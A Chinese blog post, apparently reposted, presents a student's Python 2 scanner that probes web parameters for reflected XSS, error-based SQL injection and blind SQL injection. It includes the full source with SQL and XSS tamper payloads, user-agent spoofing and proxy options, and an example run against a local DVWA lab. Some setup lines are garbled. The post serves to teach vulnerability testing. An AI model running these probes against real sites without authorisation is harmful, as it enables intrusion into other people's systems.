首頁  >  文章  >  後端開發  >  Python腳本實作Web漏洞掃描工具

Python腳本實作Web漏洞掃描工具

高洛峰
高洛峰原創
2017-02-06 13:42:012493瀏覽

這是去年畢設做的一個Web漏洞掃描小工具,主要針對簡單的SQL注入漏洞、SQL盲注和XSS漏洞,程式碼是看過github外國大神(聽說是SMAP的編寫者之一)的兩個小工具原始碼,依照裡面的想法自己寫的。以下是使用說明和原始程式碼。

一、使用說明:

1.運作環境:

Linux命令列介面+Python2.7

2.程式原始碼:

Vim scanner//建立一個名為scan2.程式原始碼:

Vim scanner//建立一個名為scancan2.程式原始碼xscanner//修改文件權限為可執行的

3.運行程序:

Python scanner//運行文件

若沒有攜帶目標URL信息,界面輸出幫助信息,提醒可以可輸入的參數。

參數包括:

--h 輸出幫助資訊

--url 掃描的URL
--data POST請求方法的參數
--cookie HTTP請求頭Cookie值
--user-agent HTTP請求頭User-Agent值
--random-agent 是否使用瀏覽器偽裝
--referer 目標URL的上一層介面
--proxy HTTP請求頭代理值

例如掃描「http://127.0.0.1/dvwa/vulnerabilities/ sqli/?id=&Submit=Submit”

Python scanner--url="http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=&Submit=Submit"--cookie="security=low;PHsqli/?id=&Submit=Submit"--cookie="security=low;PHPSESSID=low;PHPSESSID= menntb9b2isj7qha739ihg9of1"

輸出掃描結果如下:

結果顯示:

存在XSS漏洞,漏洞匹配漏洞特徵庫“”>.XSS.存在SQL注入漏洞,目標網站伺服器的資料庫類型為MySQL。

存在BLIND SQL注入漏洞。

二、原始碼:

程式碼驗證過可以運行,我個人推薦用DVWA測試吧。

#!-*-coding:UTF-8-*- 
import optparse, random, re, string, urllib, urllib2,difflib,itertools,httplib 
NAME = "Scanner for RXSS and SQLI"
AUTHOR = "Lishuze"
PREFIXES = (" ", ") ", "' ", "') ", "\"") 
SUFFIXES = ("", "-- -", "#") 
BOOLEAN_TESTS = ("AND %d=%d", "OR NOT (%d=%d)") 
TAMPER_SQL_CHAR_POOL = ('(', ')', '\'', '"''"') 
TAMPER_XSS_CHAR_POOL = (&#39;\&#39;&#39;, &#39;"&#39;, &#39;>&#39;, &#39;<&#39;, &#39;;&#39;) 
GET, POST = "GET", "POST"
COOKIE, UA, REFERER = "Cookie", "User-Agent", "Referer"
TEXT, HTTPCODE, TITLE, HTML = xrange(4) 
_headers = {} 
USER_AGENTS = ( 
"Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0", 
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36", 
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21", 
) 
XSS_PATTERNS = ( 
(r"<!--[^>]*%(chars)s|%(chars)s[^<]*-->","\"<!--.&#39;.xss.&#39;.-->\", inside the comment", None), 
(r"(?s)<script[^>]*>[^<]*?&#39;[^<&#39;]*%(chars)s|%(chars)s[^<&#39;]*&#39;[^<]*</script>","\"<script>.&#39;.xss.&#39;.</script>\", enclosed by <script> tags, inside single-quotes", None), 
(r&#39;(?s)<script[^>]*>[^<]*?"[^<"]*%(chars)s|%(chars)s[^<"]*"[^<]*</script>&#39;,"&#39;<script>.\".xss.\".</script>&#39;, enclosed by <script> tags, inside double-quotes", None), 
(r"(?s)<script[^>]*>[^<]*?%(chars)s|%(chars)s[^<]*</script>","\"<script>.xss.</script>\", enclosed by <script> tags", None), 
(r">[^<]*%(chars)s[^<]*(<|\Z)", "\">.xss.<\", outside of tags", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r"<[^>]*&#39;[^>&#39;]*%(chars)s[^>&#39;]*&#39;[^>]*>", "\"<.&#39;.xss.&#39;.>\", inside the tag, inside single-quotes", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r&#39;<[^>]*"[^>"]*%(chars)s[^>"]*"[^>]*>&#39;, "&#39;<.\".xss.\".>&#39;, inside the tag, inside double-quotes", r"(?s)<script.+?</script>|<!--.*?-->"), 
(r"<[^>]*%(chars)s[^>]*>", "\"<.xss.>\", inside the tag, outside of quotes", r"(?s)<script.+?</script>|<!--.*?-->") 
) 
DBMS_ERRORS = { 
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."), 
"Microsoft SQL Server": (r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."), 
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"), 
"Oracle": (r"ORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*") 
} 
def _retrieve_content_xss(url, data=None): 
surl="" 
for i in xrange(len(url)): 
if i > url.find(&#39;?&#39;): 
surl+=surl.join(url[i]).replace(&#39; &#39;,"%20") 
else: 
surl+=surl.join(url[i]) 
try: 
req = urllib2.Request(surl, data, _headers) 
retval = urllib2.urlopen(req, timeout=30).read() 
except Exception, ex: 
retval = getattr(ex, "message", "") 
return retval or "" 
def _retrieve_content_sql(url, data=None): 
retval = {HTTPCODE: httplib.OK} 
surl="" 
for i in xrange(len(url)): 
if i > url.find(&#39;?&#39;): 
surl+=surl.join(url[i]).replace(&#39; &#39;,"%20") 
else: 
surl+=surl.join(url[i]) 
try: 
req = urllib2.Request(surl, data, _headers) 
retval[HTML] = urllib2.urlopen(req, timeout=30).read() 
except Exception, ex: 
retval[HTTPCODE] = getattr(ex, "code", None) 
retval[HTML] = getattr(ex, "message", "") 
match = re.search(r"<title>(?P<result>[^<]+)</title>", retval[HTML], re.I) 
retval[TITLE] = match.group("result") if match else None
retval[TEXT] = re.sub(r"(?si)<script.+?</script>|<!--.+?-->|<style.+?</style>|<[^>]+>|\s+", " ", retval[HTML]) 
return retval 
def scan_page_xss(url, data=None): 
print "Start scanning RXSS:\n"
retval, usable = False, False
url = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url 
data=re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data 
try: 
for phase in (GET, POST): 
current = url if phase is GET else (data or "") 
for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w]+)=)(?P<value>[^&]+)", current): 
found, usable = False, True
print "Scanning %s parameter &#39;%s&#39;" % (phase, match.group("parameter")) 
prefix = ("".join(random.sample(string.ascii_lowercase, 5))) 
suffix = ("".join(random.sample(string.ascii_lowercase, 5))) 
if not found: 
tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("%s%s%s%s" % ("&#39;", prefix, "".join(random.sample(TAMPER_XSS_CHAR_POOL, len(TAMPER_XSS_CHAR_POOL))), suffix)))) 
content = _retrieve_content_xss(tampered, data) if phase is GET else _retrieve_content_xss(url, tampered) 
for sample in re.finditer("%s([^ ]+?)%s" % (prefix, suffix), content, re.I): 
#print sample.group() 
for regex, info, content_removal_regex in XSS_PATTERNS: 
context = re.search(regex % {"chars": re.escape(sample.group(0))}, re.sub(content_removal_regex or "", "", content), re.I) 
if context and not found and sample.group(1).strip(): 
print "!!!%s parameter &#39;%s&#39; appears to be XSS vulnerable (%s)" % (phase, match.group("parameter"), info) 
found = retval = True
if not usable: 
print " (x) no usable GET/POST parameters found"
except KeyboardInterrupt: 
print "\r (x) Ctrl-C pressed"
return retval 
def scan_page_sql(url, data=None): 
print "Start scanning SQLI:\n"
retval, usable = False, False
url = re.sub(r"=(&|\Z)", "=1\g<1>", url) if url else url 
data=re.sub(r"=(&|\Z)", "=1\g<1>", data) if data else data 
try: 
for phase in (GET, POST): 
current = url if phase is GET else (data or "") 
for match in re.finditer(r"((\A|[?&])(?P<parameter>\w+)=)(?P<value>[^&]+)", current): 
vulnerable, usable = False, True
original=None
print "Scanning %s parameter &#39;%s&#39;" % (phase, match.group("parameter")) 
tampered = current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote("".join(random.sample(TAMPER_SQL_CHAR_POOL, len(TAMPER_SQL_CHAR_POOL)))))) 
content = _retrieve_content_sql(tampered, data) if phase is GET else _retrieve_content_sql(url, tampered) 
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]): 
if not vulnerable and re.search(regex, content[HTML], re.I): 
print "!!!%s parameter &#39;%s&#39; could be error SQLi vulnerable (%s)" % (phase, match.group("parameter"), dbms) 
retval = vulnerable = True
vulnerable = False
original = original or (_retrieve_content_sql(current, data) if phase is GET else _retrieve_content_sql(url, current)) 
for prefix,boolean,suffix in itertools.product(PREFIXES,BOOLEAN_TESTS,SUFFIXES): 
if not vulnerable: 
template = "%s%s%s" % (prefix,boolean, suffix) 
payloads = dict((_, current.replace(match.group(0), "%s%s" % (match.group(0), urllib.quote(template % (1 if _ else 2, 1), safe=&#39;%&#39;)))) for _ in (True, False)) 
contents = dict((_, _retrieve_content_sql(payloads[_], data) if phase is GET else _retrieve_content_sql(url, payloads[_])) for _ in (False, True)) 
if all(_[HTTPCODE] for _ in (original, contents[True], contents[False])) and (any(original[_] == contents[True][_] != contents[False][_] for _ in (HTTPCODE, TITLE))): 
vulnerable = True
else: 
ratios = dict((_, difflib.SequenceMatcher(None, original[TEXT], contents[_][TEXT]).quick_ratio()) for _ in (True, False)) 
vulnerable = all(ratios.values()) and ratios[True] > 0.95 and ratios[False] < 0.95
if vulnerable: 
print "!!!%s parameter &#39;%s&#39; could be error Blind SQLi vulnerable" % (phase, match.group("parameter")) 
retval = True
if not usable: 
print " (x) no usable GET/POST parameters found"
except KeyboardInterrupt: 
print "\r (x) Ctrl-C pressed"
return retval 
def init_options(proxy=None, cookie=None, ua=None, referer=None): 
global _headers 
_headers = dict(filter(lambda _: _[1], ((COOKIE, cookie), (UA, ua or NAME), (REFERER, referer)))) 
urllib2.install_opener(urllib2.build_opener(urllib2.ProxyHandler({&#39;http&#39;: proxy})) if proxy else None) 
if __name__ == "__main__": 
print "----------------------------------------------------------------------------------"
print "%s\nBy:%s" % (NAME, AUTHOR) 
print "----------------------------------------------------------------------------------"
parser = optparse.OptionParser() 
parser.add_option("--url", dest="url", help="Target URL") 
parser.add_option("--data", dest="data", help="POST data") 
parser.add_option("--cookie", dest="cookie", help="HTTP Cookie header value") 
parser.add_option("--user-agent", dest="ua", help="HTTP User-Agent header value") 
parser.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value") 
parser.add_option("--referer", dest="referer", help="HTTP Referer header value") 
parser.add_option("--proxy", dest="proxy", help="HTTP proxy address") 
options, _ = parser.parse_args() 
if options.url: 
init_options(options.proxy, options.cookie, options.ua if not options.randomAgent else random.choice(USER_AGENTS), options.referer) 
result_xss= scan_page_xss(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data) 
print "\nScan results: %s vulnerabilities found" % ("possible" if result_xss else "no") 
print "----------------------------------------------------------------------------------"
result_sql = scan_page_sql(options.url if options.url.startswith("http") else "http://%s" % options.url, options.data) 
print "\nScan results: %s vulnerabilities found" % ("possible" if result_sql else "no") 
print "----------------------------------------------------------------------------------"
else: 
parser.print_help()

以上所述是小編給大家介紹的Python腳本實現Web漏洞掃描工具,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時回覆大家的。在此也非常感謝大家對PHP中文網的支持!

更多Python腳本實現Web漏洞掃描工具相關文章請關注PHP中文網!

陳述:
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn